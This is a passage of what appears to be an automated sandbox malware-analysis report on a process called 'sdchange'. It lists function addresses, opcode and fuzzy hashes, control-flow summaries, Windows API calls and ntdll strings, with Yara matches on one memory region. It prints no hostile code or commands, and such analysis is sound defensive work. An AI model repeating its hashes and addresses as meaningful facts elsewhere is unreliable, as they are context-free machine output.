                                              • Associated: 00000007.00000002.2972067792.0000000004CDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4b40000_sdchange.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 96ebfdead76b8afb84c62a5b7f493457e76f29d7f84a01019e6db7c66a644093
                                              • Instruction ID: b4568b6d7efd2003d1c94ad24b09464dc575bbff13fdfa87d143de6611dc15b5
                                              • Opcode Fuzzy Hash: 96ebfdead76b8afb84c62a5b7f493457e76f29d7f84a01019e6db7c66a644093
                                              • Instruction Fuzzy Hash: 9B90022A21340002F1807159544860A0005CBD1207F95D459B0416559CC916D96A5321
                                              Function 04BB2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2972067792.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: true
                                              • Associated: 00000007.00000002.2972067792.0000000004C69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000007.00000002.2972067792.0000000004C6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000007.00000002.2972067792.0000000004CDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4b40000_sdchange.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 8cdf2afe6261208467a5082d62d9a49345a4dbeef5d3ce5a0ea76f03a5dcb415
                                              • Instruction ID: 9073e522700ccb5ef3e230e9433c02f0f91ac53d4513890422ebee1854b5bc11
                                              • Opcode Fuzzy Hash: 8cdf2afe6261208467a5082d62d9a49345a4dbeef5d3ce5a0ea76f03a5dcb415
                                              • Instruction Fuzzy Hash: D2900222211C0042F20075694C54B070005CBD0307F55C159B0555555CC916D9625521
                                              Function 04BB2F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2972067792.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: true
                                              • Associated: 00000007.00000002.2972067792.0000000004C69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000007.00000002.2972067792.0000000004C6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000007.00000002.2972067792.0000000004CDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4b40000_sdchange.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: c23d69e2c18a196a7b6138b39c2d8f4b2c48a301a6d22b9b11a9dacc76267f6e
                                              • Instruction ID: e869f75edb9196141ff962fefaeac7c76fd8f74f702ee236f51e07c66858da4d
                                              • Opcode Fuzzy Hash: c23d69e2c18a196a7b6138b39c2d8f4b2c48a301a6d22b9b11a9dacc76267f6e
                                              • Instruction Fuzzy Hash: E690026234140442F10071594454B060005CBE1306F55C059F1465555D861ADD536126
                                              Function 04BB2AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 320 4bb2ad0-4bb2adc LdrInitializeThunk
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2972067792.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: true
                                              • Associated: 00000007.00000002.2972067792.0000000004C69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000007.00000002.2972067792.0000000004C6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000007.00000002.2972067792.0000000004CDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4b40000_sdchange.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: f501a956e576c631e69b1cccaed36f2b205c948b0af1638eb2e2cf90c11779f0
                                              • Instruction ID: 63dd7a7dd45a34edcea541188d50320671919f631b49f9a3e8b4b5a42371b83d
                                              • Opcode Fuzzy Hash: f501a956e576c631e69b1cccaed36f2b205c948b0af1638eb2e2cf90c11779f0
                                              • Instruction Fuzzy Hash: B7900226211400032105B55907445070046CBD5356355C065F1416551CD622D9625121
                                              Function 04BB2BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 322 4bb2bf0-4bb2bfc LdrInitializeThunk
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2972067792.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: true
                                              • Associated: 00000007.00000002.2972067792.0000000004C69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000007.00000002.2972067792.0000000004C6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000007.00000002.2972067792.0000000004CDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4b40000_sdchange.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: a624d791e8f2f11df80ffacb937cdd8d1891582ce2183e7e3ab2280b58b4fbfd
                                              • Instruction ID: 29b1b5c4cc9ec08c622ab69677b13efb563721dd58366d4715035a020ec2a879
                                              • Opcode Fuzzy Hash: a624d791e8f2f11df80ffacb937cdd8d1891582ce2183e7e3ab2280b58b4fbfd
                                              • Instruction Fuzzy Hash: 4B90023220140802F1807159444464A0005CBD1306F95C059B0426655DCA16DB5A77A1
                                              Function 04BB2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 321 4bb2b60-4bb2b6c LdrInitializeThunk
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2972067792.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: true
                                              • Associated: 00000007.00000002.2972067792.0000000004C69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000007.00000002.2972067792.0000000004C6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000007.00000002.2972067792.0000000004CDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4b40000_sdchange.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: b21e8efad66c756346697c681541e03d122baecf83a2d84f4483872c5e41af1c
                                              • Instruction ID: 79b4d8a1e9b92757fbe39af7102d384820983f128f22a1296641ae45a1a50bc1
                                              • Opcode Fuzzy Hash: b21e8efad66c756346697c681541e03d122baecf83a2d84f4483872c5e41af1c
                                              • Instruction Fuzzy Hash: B590026220240003610571594454616400ACBE0206B55C065F1415591DC526D9926125
                                              Function 04BB35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2972067792.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: true
                                              • Associated: 00000007.00000002.2972067792.0000000004C69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000007.00000002.2972067792.0000000004C6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000007.00000002.2972067792.0000000004CDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4b40000_sdchange.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: c62e8108c49920d7eebfb667f8cb3f46bedf9c34c8ac244f5c41a7c95f25597d
                                              • Instruction ID: 978233556863168cfab8ab09d7859f4bd39efe9ac5458393e2d3fb72496f6949
                                              • Opcode Fuzzy Hash: c62e8108c49920d7eebfb667f8cb3f46bedf9c34c8ac244f5c41a7c95f25597d
                                              • Instruction Fuzzy Hash: 2490023260550402F100715945547061005CBD0206F65C455B0825569D8796DA5265A2
                                              Function 02C648D0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 272 2c648d0-2c648ec 273 2c648f4-2c648f9 272->273 274 2c648ef call 2c7c530 272->274 275 2c648ff-2c6490d call 2c7cb30 273->275 276 2c648fb-2c648fe 273->276 274->273 279 2c6490f-2c6491a call 2c7cdd0 275->279 280 2c6491d-2c6492e call 2c7afd0 275->280 279->280 285 2c64947-2c6494a 280->285 286 2c64930-2c64944 LdrLoadDll 280->286 286->285
                                              APIs
                                              • LdrLoadDll.NTDLL(00000000,00000000,00000000,02C7632A), ref: 02C64942
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2970797470.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_2c50000_sdchange.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Load
                                              • String ID:
                                              • API String ID: 2234796835-0
                                              • Opcode ID: 18d9689ef8b136b2521bd402d68eb4271b622a9e13267d14b467ee2ee30fe7b6
                                              • Instruction ID: 254c7e6a53b16d4aa1b66183c92f852cfb4ca5ee90245ed08b9955a92a924281
                                              • Opcode Fuzzy Hash: 18d9689ef8b136b2521bd402d68eb4271b622a9e13267d14b467ee2ee30fe7b6
                                              • Instruction Fuzzy Hash: C70121B5E4020EABDF24EBE4DC85FADB779AF54308F004195E91897240F631E714DB91
                                              Function 02C79BC0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 287 2c79bc0-2c79c01 call 2c514a0 call 2c7aaf0 RtlAllocateHeap
                                              APIs
                                              • RtlAllocateHeap.NTDLL(02C7CA2C,?,02C7838E,02C7CA2C,02C78C76,02C7838E,?,02C7CA2C,?,00001000,490FEF06), ref: 02C79BFC
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2970797470.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_2c50000_sdchange.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID:
                                              • API String ID: 1279760036-0
                                              • Opcode ID: 1527f981cec88ebcf02d84f9f6a1e278167d003b0124b159ed1d5ec4c9e5cdb0
                                              • Instruction ID: 4ba0b235c5793814cc9628a9f8fd663c78c5fb336d4a46cd577c5d71c48932dd
                                              • Opcode Fuzzy Hash: 1527f981cec88ebcf02d84f9f6a1e278167d003b0124b159ed1d5ec4c9e5cdb0
                                              • Instruction Fuzzy Hash: 1FE0E5722402587BD614EE99DC46FAB77ADEFC9720F408419F909A7241D670B9508BB8
                                              Function 02C79C10 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 292 2c79c10-2c79c54 call 2c514a0 call 2c7aaf0 RtlFreeHeap
                                              APIs
                                              • RtlFreeHeap.NTDLL(?,02C7838E,490FEF06,?,00000000,490FEF06,02C7838E,?,?,?,?,?,?,?,?), ref: 02C79C4F
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2970797470.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_2c50000_sdchange.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FreeHeap
                                              • String ID:
                                              • API String ID: 3298025750-0
                                              • Opcode ID: c3977e22a9fdfef2f98023ef5141303dce5183e7b814f682f0b12ee918c1d018
                                              • Instruction ID: 1d9db1755ca1437f8f721780992dd1d94382380ae4af85224ccc374480e37604
                                              • Opcode Fuzzy Hash: c3977e22a9fdfef2f98023ef5141303dce5183e7b814f682f0b12ee918c1d018
                                              • Instruction Fuzzy Hash: A2E06D71240248BBD614EE58DC45FDB37ADEF89710F004418F909A7241D670B9108BB8
                                              Function 02C684C7 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 302 2c684c7-2c684f9 call 2c51410 call 2c72020 307 2c68502-2c68505 302->307 308 2c684fb-2c68500 SetErrorMode 302->308 308->307
                                              APIs
                                              • SetErrorMode.KERNELBASE(00008003,?,?,02C620A0,02C7838E,?,?), ref: 02C68500
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2970797470.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_2c50000_sdchange.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorMode
                                              • String ID:
                                              • API String ID: 2340568224-0
                                              • Opcode ID: b99a2b17a602d3a5a1a5f5847fcfaee4629fdb6064706f84a1c5b9d85364e3a8
                                              • Instruction ID: 48b99ad5dd75eef93a94dba8033a774084466fc63f4b132d6ad3571ddeb8e3ab
                                              • Opcode Fuzzy Hash: b99a2b17a602d3a5a1a5f5847fcfaee4629fdb6064706f84a1c5b9d85364e3a8
                                              • Instruction Fuzzy Hash: CDE08C392843423FF311F6A4DC06F6A2ACA5B85754F0888A8EE49DB2C3DA62D50086A5
                                              Function 02C684D0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 309 2c684d0-2c684d3 310 2c684dd-2c684f9 call 2c72020 309->310 311 2c684d8 call 2c51410 309->311 314 2c68502-2c68505 310->314 315 2c684fb-2c68500 SetErrorMode 310->315 311->310 315->314
                                              APIs
                                              • SetErrorMode.KERNELBASE(00008003,?,?,02C620A0,02C7838E,?,?), ref: 02C68500
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2970797470.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_2c50000_sdchange.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorMode
                                              • String ID:
                                              • API String ID: 2340568224-0
                                              • Opcode ID: 7276f3188d40b705f470631b47093e951d29d961259e623b333e21f3201b2689
                                              • Instruction ID: 2e440fec9df760ecb637fe842fc91b1e29fa535be77be9f81128afd0d22a283c
                                              • Opcode Fuzzy Hash: 7276f3188d40b705f470631b47093e951d29d961259e623b333e21f3201b2689
                                              • Instruction Fuzzy Hash: 9BD05E756803053BF600F6A4DC06F26328E9B84B54F048064F90CE72C2D965E50086A5
                                              Function 04BB2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 316 4bb2c0a-4bb2c0f 317 4bb2c1f-4bb2c26 LdrInitializeThunk 316->317 318 4bb2c11-4bb2c18 316->318
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2972067792.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: true
                                              • Associated: 00000007.00000002.2972067792.0000000004C69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000007.00000002.2972067792.0000000004C6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000007.00000002.2972067792.0000000004CDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4b40000_sdchange.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 6d036684a4274a699de0a5c3b2fc7c1eed2e75d9f355aa57121679de3d8dcbe3
                                              • Instruction ID: 138177fb78f1a7f15d5864caec9ab8e92f38ec1cdf0dc3e3e7436a0a700394d1
                                              • Opcode Fuzzy Hash: 6d036684a4274a699de0a5c3b2fc7c1eed2e75d9f355aa57121679de3d8dcbe3
                                              • Instruction Fuzzy Hash: 94B09B729015C5C5FB15F760460C7177A00EBD0706F15C0E5E2430642E4779D5D1E1B5

                                              Non-executed Functions

                                              Function 02C5E52E Relevance: .0, Instructions: 16COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2970797470.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_2c50000_sdchange.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6aa2cc60c90f14bd3491c13878466b12cf4c6dea9fc1200f45e6cb4fbcfe8499
                                              • Instruction ID: 5f0c4beea2813c00c46f1347d763832cedb5058ab601257baae903443e693a37
                                              • Opcode Fuzzy Hash: 6aa2cc60c90f14bd3491c13878466b12cf4c6dea9fc1200f45e6cb4fbcfe8499
                                              • Instruction Fuzzy Hash: 58C02B13A5100400C1100C1C38843F0F73EC387131E0023D3EE48E3A018443F0830AC8
                                              Function 04BB2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2972067792.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: true
                                              • Associated: 00000007.00000002.2972067792.0000000004C69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000007.00000002.2972067792.0000000004C6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000007.00000002.2972067792.0000000004CDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4b40000_sdchange.jbxd
                                              Similarity
                                              • API ID: ___swprintf_l
                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                              • API String ID: 48624451-2108815105
                                              • Opcode ID: 09263a4026327225185ce7363070ff5102c8716e354d405d5b448dff1562b12a
                                              • Instruction ID: 192037fc8a4c3db90a1f05aa04836ead25c967eac54dbfc80fd0bbd7d8814765
                                              • Opcode Fuzzy Hash: 09263a4026327225185ce7363070ff5102c8716e354d405d5b448dff1562b12a
                                              • Instruction Fuzzy Hash: F251C8B5A00116BFDB14DFA888949BEF7B8FB4820471081E9E4E9D7641D374FE4097E0
                                              Function 04C22410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2972067792.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: true
                                              • Associated: 00000007.00000002.2972067792.0000000004C69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000007.00000002.2972067792.0000000004C6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000007.00000002.2972067792.0000000004CDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4b40000_sdchange.jbxd
                                              Similarity
                                              • API ID: ___swprintf_l
                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                              • API String ID: 48624451-2108815105
                                              • Opcode ID: 425f2b829a62e958a848c1683da6b57b5288d3b9a1f20e0c5410af428e5740e5
                                              • Instruction ID: 6dbea695040ce0956f49725d993c8c23d88c348f821c538077a3e2ec15df8f67
                                              • Opcode Fuzzy Hash: 425f2b829a62e958a848c1683da6b57b5288d3b9a1f20e0c5410af428e5740e5
                                              • Instruction Fuzzy Hash: 0A510671A00666AFDB30DE9CCA9087EB7FAEF44204B04C4A9E496D7641E6F4FB40D760
                                              Function 04BA7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                              Download Yara Rule
                                              Strings
                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 04BE46FC
                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04BE4655
                                              • ExecuteOptions, xrefs: 04BE46A0
                                              • Execute=1, xrefs: 04BE4713
                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 04BE4787
                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04BE4725
                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04BE4742
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2972067792.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: true
                                              • Associated: 00000007.00000002.2972067792.0000000004C69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000007.00000002.2972067792.0000000004C6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000007.00000002.2972067792.0000000004CDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4b40000_sdchange.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                              • API String ID: 0-484625025
                                              • Opcode ID: 2a2fa2ad932d7593a955e71b3a4a6e43ea8ec45d9b97b000b64a3dcca1ccdc26
                                              • Instruction ID: 4e0115f5af358d6b420caae6d4f99e440c0181f09f305351548ecf4c923e3e14
                                              • Opcode Fuzzy Hash: 2a2fa2ad932d7593a955e71b3a4a6e43ea8ec45d9b97b000b64a3dcca1ccdc26
                                              • Instruction Fuzzy Hash: 0951D831A082197AEF11ABA9DC89BF977B8EF44304F0401E9E505A7190EF71FE558F90
                                              Function 04C46940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2972067792.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: true
                                              • Associated: 00000007.00000002.2972067792.0000000004C69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000007.00000002.2972067792.0000000004C6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000007.00000002.2972067792.0000000004CDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4b40000_sdchange.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                              • Instruction ID: 90ca0f05fecc196ef2e38814ebb3fb8f6ea62e5af9588b2f656e375a7cbedeeb
                                              • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                              • Instruction Fuzzy Hash: FD022671608341AFD305CF18C694A6FBBE6EFC9704F04892DF9854B264DB75EA05CB92
                                              Function 04BBB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2972067792.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: true
                                              • Associated: 00000007.00000002.2972067792.0000000004C69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000007.00000002.2972067792.0000000004C6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000007.00000002.2972067792.0000000004CDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4b40000_sdchange.jbxd
                                              Similarity
                                              • API ID: __aulldvrm
                                              • String ID: +$-$0$0
                                              • API String ID: 1302938615-699404926
                                              • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                              • Instruction ID: 0acce7baff9f9d960764c8fcb544f3dddaf20fc0627f6b7ee63138415be9ac6e
                                              • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                              • Instruction Fuzzy Hash: 0C81B370E092499EDF24CE69C8517FEBBB1EF45310F18459AD8E2A7A90D7B4B840CBD1
                                              Function 04C220E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2972067792.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: true
                                              • Associated: 00000007.00000002.2972067792.0000000004C69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000007.00000002.2972067792.0000000004C6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000007.00000002.2972067792.0000000004CDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4b40000_sdchange.jbxd
                                              Similarity
                                              • API ID: ___swprintf_l
                                              • String ID: %%%u$[$]:%u
                                              • API String ID: 48624451-2819853543
                                              • Opcode ID: 1616b523fcba02ee9ae7d1409889d2cc2c5fafad74021faf8dd0f08771550a5d
                                              • Instruction ID: 9dbce77a74a2e1b8a3208f197390e57cda0cd9c5c6333341858ccf91d83e5b02
                                              • Opcode Fuzzy Hash: 1616b523fcba02ee9ae7d1409889d2cc2c5fafad74021faf8dd0f08771550a5d
                                              • Instruction Fuzzy Hash: 5921337AA00129ABDB10DEB9DD40EFE77F9EF54644F4401A6E945E3200E770AA019BA1
                                              Function 04B9F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                              Download Yara Rule
                                              Strings
                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04BE02E7
                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04BE02BD
                                              • RTL: Re-Waiting, xrefs: 04BE031E
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2972067792.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: true
                                              • Associated: 00000007.00000002.2972067792.0000000004C69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000007.00000002.2972067792.0000000004C6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000007.00000002.2972067792.0000000004CDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4b40000_sdchange.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                              • API String ID: 0-2474120054
                                              • Opcode ID: d57ce1b9a4d5dc9a5352da41877b11e89ad752cb4b0a8e99e27ef97f3652a304
                                              • Instruction ID: 319155800b4515e83403c7c0be28aeef7356c331c1fc62ec2f4eeb8089f602e0
                                              • Opcode Fuzzy Hash: d57ce1b9a4d5dc9a5352da41877b11e89ad752cb4b0a8e99e27ef97f3652a304
                                              • Instruction Fuzzy Hash: 10E19E306047419FDB25DF29C884B7AB7E0EB89324F144AA9F5A5CB2E1D7B4E845CB42
                                              Function 04BABED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                              Download Yara Rule
                                              Strings
                                              • RTL: Resource at %p, xrefs: 04BE7B8E
                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04BE7B7F
                                              • RTL: Re-Waiting, xrefs: 04BE7BAC
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2972067792.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: true
                                              • Associated: 00000007.00000002.2972067792.0000000004C69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000007.00000002.2972067792.0000000004C6D000.00000040.00001000.00020000.00000000.sdmpDownload File
